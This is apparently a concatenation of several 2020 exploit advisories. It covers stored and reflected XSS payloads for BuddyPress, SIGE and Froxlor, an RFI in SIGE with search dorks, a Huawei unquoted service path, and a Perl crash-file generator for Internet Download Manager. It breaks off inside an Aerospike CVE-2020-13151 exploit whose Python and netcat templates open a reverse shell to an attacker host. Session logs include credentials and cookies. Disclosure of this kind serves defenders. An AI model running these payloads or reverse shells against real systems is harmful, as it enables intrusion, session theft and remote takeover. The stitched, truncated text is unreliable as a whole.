https://www.vulnerability-lab.com/get_content.php?id=2263
Release Date:
=============
2020-11-13
Vulnerability Laboratory ID (VL-ID):
====================================
2263
Common Vulnerability Scoring System:
====================================
4.2
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Are you looking for modern, robust, and sophisticated social network
software? BuddyPress is a suite of components that are common
to a typical social network, and allows for great add-on features
through WordPress’s extensive plugin system. Aimed at site builders
& developers, BuddyPress is focused on ease of integration, ease of use,
and extensibility. It is deliberately powerful yet unbelievably
simple social network software, built by contributors to WordPress.
(Copy of the Homepage: https://wordpress.org/plugins/buddypress/ &
https://buddypress.org/download/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent
xss web vulnerability in the Buddypress v6.2.0 plugin for wordpress.
Affected Product(s):
====================
Buddypress
Product: Buddypress v6.0.0 - v6.2.0 (Wordpress Plugin)
Vulnerability Disclosure Timeline:
==================================
2020-11-13: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the Buddypress v6.0.0 - v6.2.0 plugin for wordpress.
The vulnerability allows remote attackers to inject their own malicious script code via a persistent attack vector, compromising browser-to-web-application requests from the application side.
The persistent vulnerability is located in the `wp:html` name parameter
of the `figure` content. Remote attackers with privileges
are able to inject own malicious persistent script code as input to
compromise the internal ui of the wordpress backend. The attacker
injects his code and in case the admin or other privileged user account
previews the content the code simple executes. The request method
to inject is POST and the attack vector is located on the application-side.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected
application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] wp:html
Vulnerable Parameter(s):
[+] figure
Affected Module(s):
[+] page_id=x&preview=true
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with privileged user accounts and without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Inject
https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
PoC: Execute
https://test23.localhost:8000/?page_id=6
https://test23.localhost:8000/?page_id=6&preview=true
PoC: Vulnerable Source
<div id="content" class="site-content">
<div class="wrap">
<div id="primary" class="content-area">
<main id="main" class="site-main" role="main">
<article id="post-6" class="post-6 page type-page status-draft hentry">
<header class="entry-header">
<h1 class="entry-title">Mitglieder</h1><span class="edit-link">
<a class="post-edit-link"
href="https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit">
<span class="screen-reader-text">„Mitglieder“</span>
bearbeiten</a></span> </header><!-- .entry-header -->
<div class="entry-content">
<p></p>
<div class="wp-block-group"><div class="wp-block-group__inner-container">
<div class="wp-block-group"><div
class="wp-block-group__inner-container"></div></div>
</div></div>
<figure><iframe src="evil.source"
onload="alert(document.cookie)"></iframe></figure>
</div><!-- .entry-content -->
</article><!-- #post-6 -->
</main><!-- #main -->
</div><!-- #primary -->
</div><!-- .wrap -->
</div>
--- PoC Session Logs (POST) ---
https://test23.localhost:8000/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F6&_locale=user
Host: test23.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
Gecko/20100101 Firefox/76.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
X-WP-Nonce: 04a953e188
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: https://test23.localhost:8000
Content-Length: 614
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Cookie:
g3sid=bdbf56f2335bbce0720f03ed25343b66db61b54a%7E6a5nrndvh14i5kb09tfrl7afe2;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_55a3fb1cb724d159a111224c7f110400=admin_f507c7w4%7C1589912472%7CxTSn77nlwpdxYR8NUaJOXfQM9ShaBlSLzP7Anix
xNt8%7C557ca2874863d9f1f6a8316659798e11558a01ffc8671eea68d496aa5df99b17;
wp-settings-time-1=1589740723
{"id":6,"content":"<!-- wp:paragraph -->n<p></p>n<!-- /wp:paragraph
-->nn<!-- wp:group -->n<div class="wp-block-group">
<div class="wp-block-group__inner-container"><!-- wp:group -->n<div
class="wp-block-group"><div class="wp-block-group__inner-container">
<!-- wp:block {"ref":"reusable1"} /--></div></div>n<!-- /wp:group
--></div></div>n<!-- /wp:group -->nn
<!-- wp:block {"ref":"reusable1"} /-->nn<!-- wp:block
{"ref":"reusable1"} /-->nn
<!-- wp:html -->n<figure><iframe src="evil.source"
onload="alert(document.cookie)"></iframe></figure>n<!-- /wp:html
-->nn<!-- wp:bp/member /-->"}
-
POST: HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, max-age=0
Allow: GET, POST, PUT, PATCH, DELETE
Content-Type: application/json; charset=UTF-8
Vary: Origin
Server: Microsoft-IIS/8.5
X-Robots-Tag: noindex
Link: <https://test23.localhost:8000/index.php?rest_route=/>;
rel="https://api.w.org/"
Content-Length: 3108
References:
https://test23.localhost:8000/index.php
https://test23.localhost:8000/wp-admin/post.php
Security Risk:
==============
The security risk of the persistent input validation web vulnerability
in the web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-11
# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended
# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended
# Version: 3.5.3
Document Title:
===============
SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2265
Release Date:
=============
2020-11-11
Vulnerability Laboratory ID (VL-ID):
====================================
2265
Common Vulnerability Scoring System:
====================================
7.8
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
2.000€ - 3.000€
Product & Service Introduction:
===============================
It offers numerous opportunities to present pictures quickly and easily
in articles. The unique feature of the plugin is
that you can control any parameter on the syntax call. Editor Button -
SIGE Parameters: With the button, you can set the
parameters very easy on-the-fly in an article. It is an excellent
addition to SIGE. Highlights are: parameter call, watermark
function, read IPTC data, thumbnail storage, crop function, sort by
modification date, output as a list, CSS Image Tooltip,
Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was
rewritten entirely and equipped with numerous innovations.
The absolute highlight is the turbo mode. This feature doesn't exist in
any other plugin for Joomla!. In Turbo Mode 2 text files
are created from the HTML output of the gallery and loaded in successive
runs. This feature eliminates the tedious editing
process of each image. In a test with 50 large images, the creation of a
gallery with all the extra features (save thumbnails,
watermark generation, resize original images, etc.) without turbo mode
lasted approximately 17 seconds. In turbo mode, it only
took 1 second, and the gallery on the same scale was available! For
calling the syntaxes, additionally, an Editor Button has
been programmed. It makes it very easy to choose the required syntax,
showing all the settings and parameters of the plugin.
It is a great enrichment in using the SIGE plugin.
(Copy of the Homepage:
https://kubik-rubik.de/sige-simple-image-gallery-extended )
(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ;
https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ;
https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple
web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 &
v3.5.3 pro extension for joomla.
Affected Product(s):
====================
Vendor:
Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro -
Joomla Extension (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-11-10: Researcher Notification & Coordination (Security Researcher)
2020-11-11: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Open Authentication (Anonymous Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Full Disclosure
Technical Details & Description:
================================
1.1
A file include vulnerability has been discovered in the official Simple
Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla.
The web vulnerability allows remote attackers to upload web shells or other malicious content without authorization and so compromise the local file system.
The vulnerability is located in the img parameter of the print.php file.
Remote attackers are able to upload images to the unrestricted assets
path to compromise the web-applications file-system and involved
database management system. Exploitation requires no user interaction
and only
a low privileged user account to upload images.
1.2
Multiple non-persistent cross site web vulnerabilities has been
discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 &
v3.5.3 pro extension for joomla.
The vulnerability allows remote attackers to inject own malicious script
codes with non-persistent attack vector to compromise browser to
web-application requests from the client-side.
The non-persistent cross site scripting web vulnerabilities are located
in the `name` and `title` parameters of the `print.php` file.
Remote attackers without user or guest privileges are able to make own
malicious special crafted links to compromise client-side
GET method requests. The attack vector is non-persistent and the issue
affects the client-side.
Successful exploitation of the vulnerabilities results in session
hijacking, non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent client-side
manipulation of affected application modules.
Proof of Concept (PoC):
=======================
1.1
The remote file include web vulnerability can be exploited by remote attackers without a privileged user account or user interaction.
For security demonstration or to reproduce the remote file include vulnerability, follow the information and steps provided below.
Dork(s):
intext:"Powered by Simple Image Gallery Extended"
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
PoC: Exploitation
http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI
VULNERABILITY!]&name=[NAME]%20title=[TITLE]
1.2
The non-persistent cross site scripting web vulnerability can be exploited by remote attackers without a privileged user account and with low user interaction.
For security demonstration or to reproduce the non-persistent cross site scripting vulnerability, follow the information and steps provided below.
Dork(s):
intext:"Powered by Simple Image Gallery Extended"
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
PoC: Payload
"><svg onload=alert()>
'><script>alert('');</script>
<IMG "'"><script>alert()</script>'>
PoC: Example
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE]
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT
XSS]
PoC: Exploitation
http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php
?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E
Solution - Fix & Patch:
=======================
1.1
The remote file include vulnerability issue can be resolved by the
following steps ...
Example :
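<?php
// Allowlist approach: only a file name that appears in $files may be included.
// The third argument makes in_array() compare strictly (no type juggling), and
// the isset() guard avoids a notice when the parameter is absent.
$files = array('test.gif');
if (isset($_GET['file']) && in_array($_GET['file'], $files, true)) {
    include($_GET['file']);
}
?>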
* If you are a server administrator, turn off allow_url_fopen from the file
* Or do it with the ini_set command. Only for (RFI)
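<?php
// NOTE: allow_url_fopen (and allow_url_include, which is the setting that
// governs include()/require() of URLs) are PHP_INI_SYSTEM options, so calling
// ini_set() at request time returns false and changes nothing — they must be
// disabled in php.ini or the server configuration. The original also passed
// the key 'allow_url_fopen ' with a trailing space, which matches no setting.
ini_set('allow_url_fopen', 'Off');
?>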
* We can use the strpos command to check that if the address is: //
http, the file will not be enclosed
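<?php
// Refuse remote URLs before including. strpos() returns 0 (which is falsy) when
// the needle sits at offset 0, so the original `if (!$strpos)` test was inverted:
// a value beginning with "http://" passed the check and was included. Compare
// against false explicitly. This is a denylist and only a last line of defence —
// local paths and other stream wrappers are not covered by it; the allowlist in
// the first example is the reliable fix.
$url = $_GET['url'];
if (strpos($url, 'http://') === false && strpos($url, 'https://') === false) {
    include($url);
}
?>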
* Using str_replace we can give the given address from two characters
"/", "." Let's clean up
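<?php
// Reduce the request value to a bare file name and include it only from a fixed
// directory. The original stripped every "/" and "." from the value, which did
// block traversal but also destroyed legitimate names such as "test.gif" (it
// became "testgif"). basename() drops directory components without touching the
// extension, the ':' check refuses stream-wrapper syntax ("scheme:"), and
// anchoring to __DIR__ keeps the include inside one directory regardless of the
// working directory or include_path.
$url = basename((string) ($_GET['url'] ?? ''));
if ($url !== '' && $url !== '.' && $url !== '..' && strpos($url, ':') === false) {
    include(__DIR__ . '/' . $url);
}
?>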
1.2
The client-side cross site scripting vulnerabilities can be resolved by
the following steps ...
1. Encode and escape as parse the name and title parameters
2. Filter the input for special chars and disallow them in parameters
Security Risk:
==============
1.1
The security risk of the remote file include vulnerability in the img
path of the web-application request is estimated as high.
1.2
The security risk of the non-persistent cross site scripting
vulnerabilities is estimated as medium.
Credits & Authors:
==================
h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec
Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# Exploit Title: Huawei LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
# Date: 2020-11-07
# Exploit Author: Gerardo González
# Vendor Homepage: https://consumer.huawei.com/mx
# Software Link: https://consumer.huawei.com/mx
# Version: 1.0.1.0
# Tested on: Windows 10 Home Single Language x64 Esp
# Step to discover the unquoted Service:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# Service info:
Huawei LCD_Service LCD_Service C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe Auto
C:\Users\gerar>sc qc "LCD_Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: LCD_Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Huawei LCD_Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
# Exploit Title: Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-12
# Vendor Homepage: https://froxlor.org/
# Software Link: https://froxlor.org/download/
# Version: 0.10.16
Document Title:
===============
Froxlor v0.10.16 CP - (Customer) Persistent Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2241
Release Date:
=============
2020-11-12
Vulnerability Laboratory ID (VL-ID):
====================================
2241
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Froxlor Server Management Panel, the lightweight server management
software for your needs. Developed by experienced server
administrators, this open source (GPL) panel simplifies the effort of
managing your hosting. Manage reseller ressources and
limit what the customers may use in the dedicated customerpanel. MySQL
management, Directory protection & settings management.
(Copy of the Homepage: https://froxlor.org/index.php &
https://froxlor.org/download/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent
cross site vulnerability in the Froxlor Server Management Panel v0.10.16.
Affected Product(s):
====================
Froxlor Team
Product: Froxlor v0.10.16 (Stable) - Server Management Panel (Control Panel)
Affected Packages: Gentoo, Debian & Ubuntu
Vulnerability Disclosure Timeline:
==================================
2020-05-01: Researcher Notification & Coordination (Security Researcher)
2020-05-02: Vendor Notification (Security Department)
2020-05-13: Vendor Response/Feedback (Security Department)
2020-10-12: Vendor Fix/Patch (Service Developer Team)
****-**-**: Security Acknowledgements (Security Department)
2020-11-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Full Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the Froxlor Server Management Panel v0.10.16 web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The persistent cross site web vulnerability is located in the
`username`, `name` and `firstname` input fields of the customer
add or registration module. Remote attackers are able to add customers
with malicious script code as firstname or name to
manipulate in the backend the `admin_customers.php` and `customers.php`
files. The injection point is the registration
or customer add/edit module and the execution occurs on preview of the
traffic module in the admin backend. The request
method to inject is POST and the attack vector is persistent located on
the application-side. In a valid attack case the
remote attacker uses a customer or reseller account to inject the
payload as name to provoke an execute in the insecure
backend module.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected
application modules.
Request Method(s):
[+] POST
Vulnerable Input(s):
[+] Username
[+] Name
[+] Firstname
Vulnerable Module(s):
[+] Customers
Vulnerable Parameter(s):
[+] name
[+] firstname
Affected File(s):
[+] admin_customers.php
Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by remote
attackers with low privilege user account and with low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Register or login with a low privilege user account
2. Open the profile account section
3. Change the name and firstname or include in the registration process
Note: Inject test payload to vulnerable marked input fields
4. Save or submit the input via form
5. Wait until an admin or higher privileged user role opens the traffic
stats to execute
6. Successful reproduce of the persistent input validation web
vulnerability!
PoC: Payload (Exploitation)
test%20>"<script alert(document.cookie)></script>div style=1
PoC: Vulnerable Sources (Execution Points) [admin_customers.php or
customers.php to admin_traffic.php via Name & Firstname]
<tr role="row">
<td>>">test%20>"<script alert(document.cookie)></script>div
style=1[MALICIOUS SCRIPT CODE EXECUTION POINT!]
<a
href="admin_customers.php?s=9e20410f4871894db51f11258d5c4b3b&target=traffic&page=customers&action=su&id=2"
rel="external" target="_blank">[Details]</a></td>
<td><small>-</small></td>
</tr><tr role="row">
--- PoC Session Logs [POST] --- (Reseller Account to Admin)
https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20
Host: froxlor.localhost:8080
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 879
Origin: https://froxlor.localhost:8080
Connection: keep-alive
Referer:
https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add
Cookie: PHPSESSID=c34ist63ukv1vq9vt5m1hfumpo
s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add&send=send&
new_loginname=test1%20>"<script alert(document.cookie)></script>div
style=1&createstdsubdomain=0,1&
store_defaultindex=0,1&new_customer_password=KwhyqgzvPo&
new_customer_password_suggestion=KwhyqgzvPo&sendpassword=0,1&def_language=English&api_allowed=0,1&
name=btest%20>"<script alert(document.cookie)></script>div style=1&
firstname=ctest%20>"<script alert(document.cookie)></script>div
style=1&gender=0&
company=&street=&zipcode=&city=&phone=&fax=&email=trest@aol.de&customernumber=&
custom_notes=&custom_notes_show=0&diskspace=0&traffic=0&subdomains=0&emails=0&email_accounts=0&
email_forwarders=0&email_imap=0,1&email_pop3=0,1&ftps=0&mysqls=0&phpenabled=0,1&allowed_phpconfigs[]=1&
perlenabled=0&dnsenabled=0&logviewenabled=0
-
POST: HTTP/2.0 200 OK
server: Apache
vary: Accept-Encoding
content-encoding: gzip
content-length: 1393
content-type: text/html; charset=UTF-8
Reference(s):
https://froxlor.localhost:8080/
https://froxlor.localhost:8080/admin_traffic.php
https://froxlor.localhost:8080/admin_traffic.php?s=[x]&page=customers
Solution - Fix & Patch:
=======================
The vulnerability can be patched by following these steps ...
1. Validate and escape the content of the vulnerable username, name and
firstname input fields
2. Restrict the input fields and disallow specialchars on inputs to filter
3. Parse the two output location and escape or secure encode the content
4. Encode the results in the edit form on check
Security Risk:
==============
The security risk of the persistent validation web vulnerability in the
web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)
# Date: November 18, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: http://www.internetdownloadmanager.com/
# Software Link: http://www.internetdownloadmanager.com/download.html
# Version: 6.38.12
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Home Build 19041
# Steps to reproduce crash:
# 1) Execute provided Perl code
# 2) Open IDMan_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Internet Download Manager 6.38
# 5) From the Menu bar -> Downloads -> Scheduler
# 6) Check the box for 'Open the following file when done:'
# 7) Paste the contents of IDMan_Crash.txt into the input field below
# 8) Click 'Apply' and observe the crash
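#!/usr/bin/perl
# Writes the 5000-byte crash-trigger file used in the reproduction steps above:
# 1302 x "A", then 2 x "B" (the bytes that land on NSEH on Windows 7 Pro SP1),
# then "C" padding up to 5000 bytes in total.
use strict;
use warnings;

my $file = "IDMan_Crash.txt";

my $baddata = "\x41" x 1302;
$baddata .= "\x42" x 2;    # this length overwrites NSEH on Windows 7 Pro SP 1
$baddata .= "\x43" x (5000 - length($baddata));

# Three-argument open with an explicit failure check: the original two-argument
# open ignored errors, so an unwritable directory left no file behind while the
# script still reported success.
open(my $fh, '>', $file) or die "Cannot open $file for writing: $!\n";
print {$fh} $baddata;
close($fh) or die "Cannot close $file: $!\n";

print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($baddata) . "\n";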
# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
# Date: 2020-08-01
# Exploit Author: Matt S
# Vendor Homepage: https://www.aerospike.com/
# Version: < 5.1.0.3
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-13151
#!/usr/bin/env python3
import argparse
import random
import os, sys
from time import sleep
import string
# requires aerospike package from pip
import aerospike
# if this isn't installing, make sure os dependencies are met
# sudo apt-get install python-dev
# sudo apt-get install libssl-dev
# sudo apt-get install python-pip
# sudo apt-get install zlib1g-dev
# Reverse-shell command templates. `{ip}` / `{port}` are filled in with str.format()
# by _exploit() and the resulting string is handed to _send(), i.e. it is executed
# server-side through the registered UDF, not on the operator's machine.
PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&"""
NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&'
def _get_client(cfg):
    """Connect to the cluster named by ``cfg.ahost``/``cfg.aport``.

    Returns the connected aerospike client, or ``None`` (implicit) when the
    connection attempt raises — callers test the result for truthiness.
    """
    try:
        return aerospike.client({
            'hosts': [(cfg.ahost, cfg.aport)],
            'policies': {'timeout': 8000}}).connect()  # timeout in ms per the client API — TODO confirm
    except Exception as e:
        # `e.msg` presumes an aerospike exception type; a plain Python exception
        # has no `.msg` attribute and would raise AttributeError here.
        print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
def _send(client, cfg, _cmd):
    """Invoke the ``runCMD`` function of the registered ``poc`` UDF module.

    The call is applied to the dummy record written by _populate_table() and
    ``_cmd`` is passed as the single UDF argument. The Lua module itself
    (``poc.lua``) is not part of this listing, so what ``runCMD`` does with the
    argument cannot be confirmed here. The UDF return value is printed as-is.
    """
    try:
        print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd]))
    except Exception as e:
        # `e.msg` presumes an aerospike exception type — TODO confirm
        print(f"[-] UDF execution returned {e.msg}")
def _register_udf(client, cfg):
    """Upload the Lua module at ``cfg.udfpath`` to the cluster.

    A failure is reported and then re-raised unchanged; there is no fallback,
    so the caller (``_exploit``) aborts at this point.
    """
    try:
        client.udf_put(cfg.udfpath)
    except Exception as e:
        print(f"[-] whoops, couldn't register the udf {cfg.udfpath}")
        raise e
def _random_string(l):
    """Return ``l`` pseudo-random ASCII letters (lower- and upper-case).

    Backed by ``random.choice``, so it is not cryptographically strong; that is
    acceptable here because the value only serves as a throwaway record key.
    """
    alphabet = string.ascii_lowercase + string.ascii_uppercase
    picks = (random.choice(alphabet) for _ in range(l))
    return ''.join(picks)
def _populate_table(client, cfg):
    """Write one dummy record so that a later ``client.apply`` has a key to target.

